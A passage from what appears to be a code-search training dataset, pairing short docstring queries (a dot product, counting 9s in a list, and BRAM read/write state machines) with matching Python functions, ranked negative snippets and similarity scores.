"0.6011553"
] |
0.84245884
|
0
|
Loopbased function that finds the dot product of the lists L and K
|
def dot(L,K):
result = 0
if len(L) != len(K):
result = 0
else:
for x in range(len(L)):
result = result + (L[x]*K[x])
return result
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def dotproduct(v1, v2):\n\treturn sum(imap(operator.mul, v1, v2))",
"def dot_prod(u,v):\n each_product = []\n for i in range(len(u)):\n each_product.append(u[i] * v[i])\n return sum(each_product)",
"def dot_product(v1, v2):\n #print(v1, v2)\n sum = 0\n\n for i in range(len(v1)):\n #print(v1[i], v2[i])\n sum += v1[i] * v2[i]\n return sum",
"def dotproduct(x, y):\n return sum(imap(operator.mul, x, y))",
"def dot_product(u, v):\n sum_of_products = 0\n if u!= None:\n if v!= None:\n for combo in zip(u, v):\n sum_of_products += (combo[0] * combo[1])\n return sum_of_products",
"def dot_product(v, w):\n return sum(v_i * w_i for v_i, w_i in zip(v, w))",
"def dot_product(a,b):\n return sum(pairwise_mult(a,b))",
"def dotProduct(v1, v2):\n return sum((a * b) for a, b in zip(v1, v2))",
"def get_dot_product(v1,v2):\n #sets default dot product\n dot_product = 0\n \n for key in v2:\n if key in v1:\n # updates the dot product if key is present in both vectors\n dot_product += v1[key]*v2[key]\n #returns final dot product\n return dot_product",
"def dot_product(v,w):\n return v[0] * w[0] + v[1] * w[1]",
"def dot_product(a, b):\n dp = 0.0\n for i, j in zip(a, b):\n dp += i * j\n return dp",
"def dot(a,b):\n acc = 0\n for k in b.keys():\n acc += a[k] * b[k]\n return acc",
"def dot_kf(u, v):\n # TODO: implement the kernel function\n\n counter = 0\n if len(u)==len(v):\n for i in range(len(u)):\n counter = counter + (u[i]*v[i])\n return counter",
"def dot(a, b):\n return sum([a[i]*b[i] for i in range(2)])",
"def dot_product(v1, v2):\n return v1[0]*v2[0] + v1[1]*v2[1] + v1[2]*v2[2]",
"def dot_product(v1, v2):\n return v1[0] * v2[0] + v1[1] * v2[1]",
"def lpDot(v1, v2):\n\tif not isinstance(v1, list) and not isinstance(v2, list):\n\t\treturn v1 * v2\n\telif not isinstance(v1, list):\n\t\treturn lpDot([v1]*len(v2),v2)\n\telif not isinstance(v2, list):\n\t\treturn lpDot(v1,[v2]*len(v1))\n\telse:\n\t\treturn lpSum([lpDot(e1,e2) for e1,e2 in zip(v1,v2)])",
"def dot_product(vec_1:tuple, vec_2:tuple)->float:\n return vec_1[0] * vec_2[0] + vec_1[1] * vec_2[1]",
"def dot_product(vector1, vector2):\n return [reduce_by_multiplication(pair) for pair in zip(vector1, vector2)]",
"def _dot(a, b):\n return np.einsum('ijk,ikl->ijl', a, b)",
"def dotproduct(vec1, vec2, sum=sum, map=map, mul=mul):\n return sum(map(mul, vec1, vec2))",
"def mult(lists, k: int) -> list:\r\n return (np.multiply(lists, k)).tolist()",
"def dotproduct(vec1, vec2):\n import operator\n return sum(map(operator.mul, vec1, vec2))",
"def _listdot(d1, d2):\n return [np.dot(x[0].T, x[1]) for x in zip(d1, d2)]",
"def dotproduct(vec1, vec2):\n return sum((a*b) for a, b in zip(vec1, vec2))",
"def dot(vector01,vector02):\r\n result = 0\r\n # creates the initial value for the result of the dot product\r\n for z in range(len(vector01)):\r\n # for loop which continues as long as there are more values left in the vector \r\n result += vector01[z]*vector02[z]\r\n # the new result is found to be the corresponding values in each vector multiplied and then added together \r\n return result",
"def dot_product(u, v):\n ret = 0.0\n for i in range(len(u)):\n ret += float(float(u[i]) * float(v[i]))\n return ret",
"def dot(self,other):\n if len(self) == len(other):\n res = 0\n for a,b in zip(self,other):\n res += a*b\n return res\n else: \n raise ValueError(\"The length is not matched\")",
"def calc_k_dot_r(self):\n\t\n\tself.k_dot_r = self.k[0]*self.rij[0,:,:,:] + self.k[1]*self.rij[1,:,:,:] + self.k[2]*self.rij[2,:,:,:]\n\t\n\treturn",
"def dot_product(A, B):\n A_rows = len(A)\n A_columns = len(A[0])\n\n B_rows = len(B)\n B_columns = len(B[0])\n\n if (A_columns == B_rows) and (A_rows == 1 and B_columns == 1):\n\n dot_product = []\n \n dot_product.append(sum([A[0][i]*B[i][0] for i in range(A_columns)]))\n\n return float(dot_product)\n \n else:\n print(\"dimensions of vector do not match.\")"
] |
[
"0.7087473",
"0.7082206",
"0.69925463",
"0.6855394",
"0.6757962",
"0.67315555",
"0.67204964",
"0.67034316",
"0.66845644",
"0.6589555",
"0.6563364",
"0.6471573",
"0.64645624",
"0.6464455",
"0.64520186",
"0.64379126",
"0.6426547",
"0.6409601",
"0.6401266",
"0.64010394",
"0.6390998",
"0.63884085",
"0.63883626",
"0.63738877",
"0.63544583",
"0.635285",
"0.6341225",
"0.6313844",
"0.6305197",
"0.6301911"
] |
0.8606569
|
0
|
loopbased function that counts the number of 9s in a given array
|
def count9(L):
result = 0
for x in L:
if x == 9:
result = result + 1
return result
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def array_count9(nums):\n count = 0\n if len(nums) >= 4:\n for i in range (4):\n if nums[i] == 9:\n count += 1\n return count > 0\n else:\n for i in range (len(nums)):\n if nums[i] == 9:\n count += 1\n return count > 0\n\n # #Better solution:\n # end = len(nums)\n # if end > 4:\n # end = 4\n # for i in range(end):\n # if nums[i] == 9:\n # return True\n # return False",
"def countTriplets(arr, r):\n c_2, c_3 = Counter(), Counter()\n n_triplets = 0\n for e in arr:\n # print(f'arr: {arr}, e: {e}, c_3: {c_3}, c_2: {c_2}, n_triplets: {n_triplets}')\n if e in c_3:\n n_triplets += c_3[e]\n if e in c_2:\n c_3[e*r] += c_2[e]\n c_2[e*r] += 1\n return n_triplets",
"def countZeroes(arr):\n counter = 0\n #sort the array\n arr.sort(reverse=True)\n print(arr)\n n = len(arr)\n print(n)\n\n # Find index of first zero in given array\n first = firstZero(arr, 0, n - 1)\n \n # If 0 is not present at all, return 0\n if (first == -1):\n return 0\n\n for i in range(first,len(arr)):\n if (arr[i] == 0):\n counter += 1\n else:\n break\n\n return counter",
"def count(array, value):\n count = 0\n for i in range (len(array)):\n if (array[i] == value):\n count += 1\n return count",
"def summer_of_69(arr):\n total = 0\n add = True\n for num in arr:\n while add:\n if num != 6:\n total += num\n break\n else:\n add = False\n break\n while not add:\n if num != 9:\n break\n else:\n add = True\n break\n return total",
"def counts(e, x):\n arr = np.asarray(arr)\n return len(np.where(arr == x)[0])",
"def countTriplets1(arr, r):\n from collections import Counter\n arr_dict = Counter()\n ratio_range = []\n triplets = 0\n\n # Build the counter\n for x in arr:\n arr_dict[x] += 1\n\n # Build a list for easier iteration\n for key, value in arr_dict.items():\n ratio_range.append(tuple([key,value]))\n ratio_range.sort()\n \n for y in range(len(ratio_range)-2):\n firstvalue = ratio_range[y][1]\n secondvalue = ratio_range[y+1][1]\n thirdvalue = ratio_range[y+2][1]\n print(ratio_range, firstvalue, secondvalue,thirdvalue)\n\n summedvalue = (firstvalue + secondvalue + thirdvalue) - 3\n triplet_count = 2**summedvalue\n print(summedvalue, triplet_count)\n triplets += triplet_count\n\n return triplets, arr_dict, ratio_range",
"def count(seq):\n\treturn sum(1 for x in seq)",
"def countTriplets4(arr, r):\n from collections import Counter\n arr_dict = {}\n n0 = arr[0]\n max_arr = max(arr)\n ratio_range = {n0: 0}\n triplets = 0\n\n # Build all possible values\n index = n0 \n counter = 1\n while index < max_arr:\n index *= r\n ratio_range[index] = counter\n counter += 1\n if index > max_arr: ratio_range.pop(index)\n \n # Remove anything that isn't a possible value and build the dictionary\n for x in range(len(arr)-1, -1, -1):\n if arr[x] not in ratio_range: \n arr.pop(x)\n continue\n if arr[x] in arr_dict:\n arr_dict[arr[x]] = [x] + arr_dict[arr[x]]\n else:\n arr_dict[arr[x]] = [x]\n if len(arr) < 3: return triplets # return 0 if there are not enough items left in arr to make a triplet\n\n # Iterate backwards through arr starting at index arr[-2]\n for n in range(len(arr)-2, -1, -1):\n item = arr[n]\n item_before = item // r if item // r in ratio_range else 0 # Set to 0 if the next value in the progression does not appear in the input\n item_after = item * r if item * r in ratio_range else 0 # Set to 0 if the previous value in the progression does not appear in the input\n if not item_before or not item_after: continue # Continue in the loop if triplets are not possible with 'item' as 'j'\n \n counter_before = sum(1 for x in arr_dict[item_before] if x < n)\n counter_after = sum(1 for x in arr_dict[item_after] if x > n)\n triplets += counter_before * counter_after\n return triplets",
"def how_many(e, x):\n return count(np.asarray(x) == e)",
"def count_digit(x, i):\n \"\"\" GRAPSTE TON KWDIKA SAS APO KATW \"\"\"\n su = 0\n s = 0\n k = x\n while(i>1):\n x = x//10\n i = i-1\n s = x%10\n while(k>0):\n if((k%10)==s):\n su = su + 1\n k = k//10\n return su",
"def count():",
"def count_numbers(board: list, x: int, y: int):\n nums = []\n for i in range(9):\n # Adds number to list if it finds one in the col or row\n if not board[i][x] == 0:\n nums.append(board[i][x])\n if not board[y][i] == 0:\n nums.append(board[y][i])\n # Does the same as the find_group function, finds the group of the cell\n x_group = x - x % 3\n y_group = y - y % 3\n for i in range(3):\n for z in range(3):\n # Adds group numbers to list\n if not board[y_group + i][x_group + z] == 0:\n nums.append(board[y_group + i][x_group + z])\n # returns the length of unrepeated number in the col, row and group\n return len(set(nums))",
"def test_expand_counts(self):\n c = array([2,0,1,2])\n self.assertEqual(expand_counts(c), array([0,0,2,3,3]))",
"def count_sheeps(arrayOfSheeps):\n count = 0\n for i in arrayOfSheeps:\n if i == True:\n count += 1\n return count",
"def unique_digits(n):\n \"*** YOUR CODE HERE ***\"\n count = 0\n for k in range(0, 10):\n if has_digit(n, k):\n count = count + 1\n return count",
"def monkey_count(n):\n return [i for i in range(1, n + 1)]",
"def count(self, element):\n count = 0\n for i in range(self._length): # Increment count when equal value is found\n if self._arr[i] == element:\n count += 1\n return count",
"def count_colors(cards: np.ndarray) -> np.ndarray:\n result = np.zeros(4, np.int32)\n cards.sum()\n result[0] = (cards[0:9]).sum()\n result[1] = (cards[9:18]).sum()\n result[2] = (cards[18:27]).sum()\n result[3] = (cards[27:36]).sum()\n return result",
"def count_sort(arr: StaticArray) -> StaticArray:\n # finds the maximum element\n maximum = arr[0]\n for index in range(arr.size()):\n if abs(arr[index]) > maximum:\n maximum = abs(arr[index])\n\n # creates max+1 arrays for positives and negatives\n maximum += 1\n count_pos = StaticArray(maximum)\n count_neg = StaticArray(maximum)\n\n # records the number of iterations of an array element\n # by setting the corresponding index position of the count array to the number of iterations\n for index in range(arr.size()):\n current = arr[index]\n\n # positive numbers\n if current > 0:\n if count_pos[current] is None:\n count_pos.set(current, 1)\n else:\n count_pos[current] += 1\n\n # zero\n elif current == 0:\n if count_pos[0] is None:\n count_pos[0] = 1\n else:\n count_pos[0] += 1\n\n # negative numbers\n else:\n if count_neg[abs(current)] is None:\n count_neg.set(abs(current), 1)\n else:\n count_neg[abs(current)] += 1\n\n # sums non-empty spaces and sets empty spaces equal to zero\n length = 0\n # iterate through positive array\n for index in range(count_pos.size()):\n if count_pos[index] is None:\n count_pos[index] = 0\n else:\n length += count_pos[index]\n\n # iterate through negative array\n for index in range(count_neg.size()):\n if count_neg[index] is None:\n count_neg[index] = 0\n else:\n length += count_neg[index]\n\n # create array for the results\n result_array = StaticArray(length)\n\n # adds elements in positive array to results array from largest to smallest\n result_array_index = 0\n last = count_pos.size() - 1\n for index in range(count_pos.size()):\n while count_pos[last] > 0:\n result_array.set(result_array_index, last)\n result_array_index += 1\n count_pos[last] -= 1\n last -= 1\n\n # adds elements in negative array to results array from largest to smallest\n for index in range(count_neg.size()):\n while count_neg[index] > 0:\n result_array.set(result_array_index, -index)\n result_array_index += 1\n count_neg[index] -= 1\n\n return result_array",
"def birthdayCakeCandles(n, ar):\n\n tallest = max(ar)\n return ar.count(tallest)",
"def _count_zero(number):\n zero_count = 0\n while number > 9:\n if number % 10 == 0:\n zero_count += 1\n number /= 10\n else:\n break\n return zero_count",
"def countTriplets3(arr, r):\n from collections import Counter\n from math import factorial\n arr_dict = Counter()\n n0 = arr[0]\n\n # If the ratio 'r' is 1 then this is a special case of combinations\n if r == 1:\n for x in arr:\n if x == n0: arr_dict[x] += 1\n n = arr_dict[n0]\n r2 = 3\n return factorial(n)//(factorial(r2)*factorial(n-r2)), arr_dict\n\n # Main variables for the rest of the function\n max_arr = max(arr)\n ratio_range = [n0]\n triplets = 0\n\n # Build all possible values\n index = n0 \n counter = 0\n while index < max_arr:\n index *= r\n ratio_range.append(index)\n counter += 1\n if ratio_range[-1] > max_arr: ratio_range.pop(-1)\n \n # Build the counter\n for x in arr:\n if x in ratio_range: arr_dict[x] += 1\n\n # With the 1 special case removed, there now cannot be triplets if there are not 3 items in the dict\n if len(arr_dict) < 3: return triplets, arr_dict, ratio_range\n\n for y in range(len(ratio_range)-2):\n firstkey = ratio_range[y]\n secondkey = ratio_range[y+1]\n thirdkey = ratio_range[y+2]\n \n # If there are no triplets then the loop will exit without incrementing triplets \n if firstkey not in arr_dict or secondkey not in arr_dict or thirdkey not in arr_dict: \n continue\n else:\n firstvalue = arr_dict[firstkey]\n secondvalue = arr_dict[secondkey]\n thirdvalue = arr_dict[thirdkey]\n \n triplet_count = (firstvalue) * (secondvalue) * (thirdvalue)\n triplets += triplet_count\n\n return triplets, arr_dict",
"def count_element (input_list):\n counter = 0\n for dummy_i in input_list:\n counter +=1\n return counter",
"def count_to10():\n numberx = 0\n while numberx < 10:\n numberx += 1\n print(numberx)",
"def test_counts(self):\n c = array([5,0,1,1,5,5])\n obs = counts(c)\n exp = array([1,2,0,0,0,3])\n self.assertEqual(obs, exp)\n d = array([2,2,1,0])\n obs = counts(d, obs)\n exp = array([2,3,2,0,0,3])\n self.assertEqual(obs, exp)",
"def Hashtables__Triplets():\n # URL: https://www.hackerrank.com/challenges/count-triplets-1/problem\n ## Passes all tests\n # O(n) ish.\n # dae9ccff5aea4a8ca6e087a7c16bd70d Notability notes\n from collections import defaultdict\n from dataclasses import dataclass\n\n @dataclass\n class I:\n idx: int\n cnt: int\n\n\n def countTriplets(arr, r):\n d = defaultdict(list)\n prev_count = defaultdict(int) #\n triple_count = 0\n for i, v in enumerate(arr):\n prev = v / r # (!) Integer division can be wrong. 17 // 3 -> 5. This builds incorrect previous (5, 17)\n prev_prev = (prev / r, prev)\n\n if prev_prev in d:\n # cnt = sum([i.cnt for i in d[prev_prev]]) # Counting the whole chain can be O(n) ish. Tests 6,11 fail.\n cnt = prev_count[(prev / r, prev, \"sum\")] # Optimization, keep rolling sum. -> O(1)\n triple_count += cnt\n if prev in d:\n prev_c = len(d[prev]) # O(1)\n d[(prev, v)].append(I(i, prev_c))\n prev_count[(prev, v, \"sum\")] += prev_c # Keep rolling su.\n d[v].append(i)\n\n return triple_count\n\n _, r = [int(i) for i in input().split()]\n arr = [float(i) for i in input().split()]\n print(countTriplets(arr, r))\n\n #### wip entries\n # T (Submission 6) -> (integer devision issue.\n # 100000 3\n # 1 17 80 68 5 5 58 17 38 81 26 44 38 6 12 ...\n # expr: 2325652489\n # Act : 667065187 << wrong, under count.\n # ac2 : 19107507001 << wrong, over count. (integer devision issue.\n # ac3: 2325652489",
"def countDigits(n):\n digits = [0]*10\n while n > 0:\n digits[n%10] += 1\n n = n//10\n return digits",
"def countElements(self, nums):\n import sys\n max_n = -sys.maxint\n min_n = sys.maxint\n\n for n in nums:\n max_n = max(n, max_n)\n min_n = min(n, min_n)\n\n count = 0\n for n in nums:\n if min_n < n < max_n:\n count += 1\n return count",
"def sort_012(input_list):\n cnt0=0 # number of 0's in the array\n cnt1=0 # number of 1's in the array\n cnt2=0 # number of 2's in the array\n for num in input_list:\n if num==0:\n cnt0+=1\n elif num==1:\n cnt1+=1\n else:\n cnt2+=1\n\n ans=[0]*cnt0+[1]*cnt1+[2]*cnt2 # form a list with the individual counts\n return ans"
] |
[
"0.70626134",
"0.6769188",
"0.6477547",
"0.6390147",
"0.63446254",
"0.63192827",
"0.6296587",
"0.62494373",
"0.62323403",
"0.6124918",
"0.607212",
"0.6051759",
"0.60271645",
"0.6020566",
"0.59873253",
"0.598094",
"0.59699416",
"0.59053385",
"0.5871887",
"0.58604145",
"0.58533627",
"0.5852384",
"0.5849883",
"0.58493596",
"0.58423936",
"0.583423",
"0.58238715",
"0.5796608",
"0.57857776",
"0.57846224"
] |
0.7521141
|
0
|
State machine to write incomming data into memory
|
def write_sm(self):
while True:
# wait to receive incoming data
(addr, data) = yield self.w_in_pipe.get()
# model write latency
#for i in range(self.write_latency):
yield self.wait_sys_clks(self.write_latency)
# try to write data into memory
if addr in self.mem.keys():
self.mem[addr] = data
else:
print >> sys.stderr, "ERROR: BRAM write_sm: specified address {} is out of range".format(addr)
# indicate write_completion
self.wr_count += 1
if self.w_out_pipe is not None:
done = 1
self.w_out_pipe.put(done)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def TransferMemorySequence():\r\n pass",
"def send_state(self):\n self.state = self.enigma.get_state()\n messages = self.notify_slaves()\n for message in messages:\n self.network.messages_to_slaves.append(message)",
"def update(self):\n self.write_state(bytes([]))",
"def store(self, state, act, rew, next_state):\n # buffer has to have room so you can store\n if self.ptr == self.max_size:\n self.state_buf.pop(0)\n self.act_buf.pop(0)\n self.rew_buf.pop(0)\n self.next_state_buf.pop(0)\n self.ptr -= 1\n\n # Environment related, subject to change\n # Old version\n #self.state_buf.append(np.expand_dims(state, axis = 0))\n #self.act_buf.append(np.expand_dims(act, axis = 0))\n #self.rew_buf.append(np.array(rew, ndmin = 1))\n #self.next_state_buf.append(np.expand_dims(next_state, axis = 0))\n\n # New version (best suited for decentralized)\n self.state_buf.append(state)\n self.act_buf.append(act)\n self.rew_buf.append(rew)\n self.next_state_buf.append(next_state)\n self.ptr += 1",
"def ingestState(self, data):\n # ignorant agents might not do anything with the state\n if not data:\n return\n\n args = struct.unpack('!ffffffB',data)\n \n self.gameState = GameState(args[0],args[1],args[2],args[3],args[4],args[5])\n self.gameState.parseFlags(args[6])",
"def test_io_in_out_loop(self):\n self.l.output(conf_io=0x1, state_io=0x0)\n for i in range(10):\n state_d, state_io, count = self.l.output(state_io=0x1)\n self.assertTrue(state_io & 0x2)\n state_d, state_io, count = self.l.output(state_io=0x0)\n self.assertTrue(not state_io & 0x2)",
"def push_sm(self):\r\n popped_data = 0\r\n\r\n while True:\r\n popped_data_valid = 0\r\n # wait to receive incoming data\r\n data = yield self.w_in_pipe.get()\r\n # model write latency\r\n #for i in range(self.write_latency):\r\n yield self.wait_sys_clks(self.write_latency)\r\n # first enque the item\r\n self.items.append(data)\r\n # then insert in the correct position and shift (sorting)\r\n #for i in range(self.shift_latency):\r\n yield self.wait_sys_clks(self.shift_latency)\r\n self.items.sort()\r\n if len(self.items) > self.maxsize : # Peixuan Q: what if len = maxsize, should we keep the data?\r\n popped_data = self.items.pop(len(self.items)-1)\r\n popped_data_valid = 1\r\n # indicate write_completion\r\n if self.w_out_pipe is not None:\r\n done = 1\r\n self.w_out_pipe.put((done, popped_data, popped_data_valid)) # tuple\r",
"def dump(self,out):\n if self.changed: raise StateError(_('Data changed: ')+ self.name)\n if not self.data: raise StateError(_('Data undefined: ')+self.name)\n out.write(struct.pack('4s3i',self.name,self.size,self.delFlag,self.recFlag))\n out.write(self.data)",
"def send_states(self,t=0,state=None, a=None,p=None, state_type='c'):\r\n if state == None:\r\n if state_type == 'd':\r\n state = self.grid_state\r\n else:\r\n state = self.real_state\r\n\r\n\r\n if a == None:\r\n a = self.action\r\n # find index of the action in action set\r\n a_ind = list(self.action_space).index(a)\r\n degree = self.degree\r\n id = self.id\r\n data = {0:id,1:t,2:a_ind,3:state,4:p,5:degree}\r\n txt = json.dumps(data)\r\n fp = open('w_buf.json','w')\r\n if fp.writable():\r\n fp.write(txt)\r\n else:\r\n print(\"Error: Fail to write Agent data\")\r\n fp.close()\r\n return False\r\n fp.close()\r\n return True",
"def get_states(self):\r\n self.msg_send_upr.data[0] = b\"\\x0f\"[0]\r\n self.send_and_flush(self.msg_send_upr)",
"def push_write(self, s):\n ...",
"def serialize(self, buff):\n try:\n _x = self.state_path\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.state_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.initial_state_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.input_keys)\n buff.write(_struct_I.pack(length))\n for val1 in self.input_keys:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.output_keys)\n buff.write(_struct_I.pack(length))\n for val1 in self.output_keys:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.cond_outcome)\n buff.write(_struct_I.pack(length))\n for val1 in self.cond_outcome:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.cond_transition)\n buff.write(_struct_I.pack(length))\n for val1 in self.cond_transition:\n length = len(val1.state_name)\n buff.write(_struct_I.pack(length))\n for val2 in val1.state_name:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val2))\n length = len(val1.state_outcome)\n buff.write(_struct_I.pack(length))\n for val2 in val1.state_outcome:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val2))\n _x = self.behavior_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.parameter_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.parameter_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.parameter_values)\n buff.write(_struct_I.pack(length))\n for val1 in self.parameter_values:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n buff.write(_get_struct_2f().pack(*self.position))\n length = len(self.outcomes)\n buff.write(_struct_I.pack(length))\n for val1 in self.outcomes:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.transitions)\n buff.write(_struct_I.pack(length))\n for val1 in self.transitions:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.autonomy)\n buff.write(_struct_I.pack(length))\n pattern = '<%sb'%length\n buff.write(struct.Struct(pattern).pack(*self.autonomy))\n length = len(self.userdata_keys)\n buff.write(_struct_I.pack(length))\n for val1 in self.userdata_keys:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.userdata_remapping)\n buff.write(_struct_I.pack(length))\n for val1 in self.userdata_remapping:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))",
"def __state_cb(self, data):\n self.state = data",
"def peek_write(self):\n ...",
"def _serialize(self, state, handle):\n raise NotImplementedError",
"def update(self):\n self._state = read_input(self._port)",
"def send_states_v2(self,t, transition=None, p=None):\r\n\r\n data = {}\r\n data[\"id\"] =self.id\r\n data[\"t\"] =round(t,1)\r\n data[\"d\"] =self.degree\r\n if p != None:\r\n data[\"p\"] = p\r\n\r\n if transition != None:\r\n data[\"s\"] = np.round(transition[0],2).tolist()\r\n data[\"a\"] = list(self.action_space).index(transition[1])\r\n data[\"sn\"] = np.round(transition[2],2).tolist()\r\n txt = json.dumps(data)\r\n fp = open('w_buf_1.json','w')\r\n if fp.writable():\r\n fp.write(txt)\r\n print(\"Wrote Params. \")\r\n else:\r\n print(\"Error: Fail to write Agent data\")\r\n fp.close()\r\n return False\r\n fp.close()\r\n return True",
"def transfer_data(self):\n pass",
"def step(self,inp): ## function responsible for exciting the machine with a SINGLE INPUT VALUE\n (s, o) = self.getNextValues(self.state,inp)\n # will store the state and return the output\n self.state =s\n return o",
"def __getstate__(self):\n return (dumps(self.stdin), dumps(self.stdout), dumps(self.stderr))",
"def forward(self, inputs, prev_state):\n\n # get interface vectors\n erase_vector = self.sigmoid(self.erase_vectors(inputs))\n write_gate = self.sigmoid(self.write_gate(inputs))\n write_vector = self.write_vectors(inputs)\n read_keys = self.read_keys(inputs)\n read_strengths = self.softplus(self.read_strengths(inputs))\n write_vector = write_vector.view(-1, self.num_write_heads, self.num_cols)\n erase_vector = erase_vector.view(-1, self.num_write_heads, self.num_cols)\n read_keys = read_keys.view(-1, self.num_read_heads, self.num_cols)\n\n # write memory\n usage = self._update_usage(prev_state['usage'], prev_state['write_weights'])\n write_weights = self._write_weights(write_gate, usage)\n updated_memory = self._erase_and_write(prev_state['memory'], write_weights, write_vector, erase_vector)\n # read memory based only on content lookup\n read_weights = self.content_attention(prev_state['memory'], read_keys, read_strengths)\n read_vectors = torch.matmul(read_weights, updated_memory)\n memory_state = {\n 'memory': updated_memory,\n 'write_weights': write_weights,\n 'read_weights': read_weights,\n 'usage': usage\n }\n return read_vectors, memory_state",
"def savestate(self, state):\n pass",
"def recv_maintain(self):\n while True:\n # maintain the state list size\n while len(self.state_list) > self.state_list_size:\n self.state_list = self.state_list[(len(self.state_list) - self.state_list_size):]\n\n # read from socket, decode the message, and append to state buffer\n try:\n mesg = self.sock.recv(1024).decode()\n time.sleep(1/self.recv_rate)\n except socket.error as e:\n err = e.args[0]\n # no data in buffer for non-blocking socket to copy\n if err == errno.EAGAIN or err == errno.EWOULDBLOCK:\n mesg = None\n # other error occurs\n else:\n sys.exit(1)\n else:\n self.state_buf_str += mesg\n update_state = self.state_str_parse()\n if update_state is not None:\n for state in update_state:\n self.state_list.append(state)\n update_state = None",
"def store(self, state, action, reward, next_state, done):\n self.replay_memory.append((state, action, reward, next_state, done))",
"def idle(self):\n\n logging.info('writing idle shm')\n self.shm_command.write({'cmd': 'idle', 'data': {}})",
"def stream_state_changed(self,state,arg):\n pass",
"def writeInput(self):\n\n #self.collect.writeInput()",
"def _send_data_to_nn(self,wbtData):\n\t\tself._neuralNetwork.stdin.write(\"COMM IN\\n\") # this shitty COMM IN is not really needed..to modify in closedloop.py\n\t\tself._neuralNetwork.stdin.write(wbtData)",
"def _add_io_state(self, state):\n if self._state != state:\n state = self._state = self._state | state\n self._update_handler(self._state)",
"def stdin_read(self, data):\n self.write_master(data)"
] |
[
"0.59692395",
"0.5955333",
"0.58689207",
"0.5767663",
"0.5702709",
"0.57007813",
"0.5687097",
"0.5678996",
"0.56627923",
"0.56499904",
"0.5644262",
"0.5623464",
"0.5596828",
"0.55803",
"0.5578878",
"0.55625767",
"0.5532469",
"0.5525875",
"0.5517828",
"0.54954076",
"0.5493518",
"0.54644644",
"0.5458587",
"0.54581344",
"0.54400355",
"0.54370046",
"0.5425097",
"0.5422503",
"0.540764",
"0.53980434"
] |
0.6438711
|
0
|
State machine to read data from memory
|
def read_sm(self):
while True:
# wait to receive a read request
addr = yield self.r_in_pipe.get()
# model read latency
#for i in range(self.read_latency):
yield self.wait_sys_clks(self.read_latency)
# try to read data from memory
if addr in self.mem.keys():
data = self.mem[addr]
else:
print >> sys.stderr, "ERROR: BRAM read_sm: specified address {} is out of range".format(addr)
data = None
self.rd_count += 1
# write data back
self.r_out_pipe.put(data)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def load_state(self):\n return self.state.read()",
"def _read_data(self):",
"def read():\n # TODO",
"def readState(self, saveState: ghidra.framework.options.SaveState) -> None:\n ...",
"def read( self, store ):\n\t\tassert 1<=store<=2, \"Can only read data to store 1 or 2\"\n\t\tdata = self.mpr.touched()\n\t\tfor i in range( 12 ):\n\t\t\tself.touched[i+(store-1)*12] = 1 if data & (1<<i) else 0",
"def readData(self, key, context):\n\n print(\"key: {}\".format(key))\n address = _make_benchcontract_address(\"key_{}\".format(key))\n print(\"address: {}\".format(address))\n data = context.get_state(\n [address],\n timeout=self.timeout)\n print(\"readData obtained {} --> {} from state\".format(key, data[\"data\"]))\n return 0",
"def read(self):",
"def read(self, sacc_data: sacc.Sacc) -> None:",
"def read(self, sacc_data: sacc.Sacc) -> None:",
"def read(self, sacc_data: sacc.Sacc) -> None:",
"def _get_state(self):",
"def read(self):\n pass",
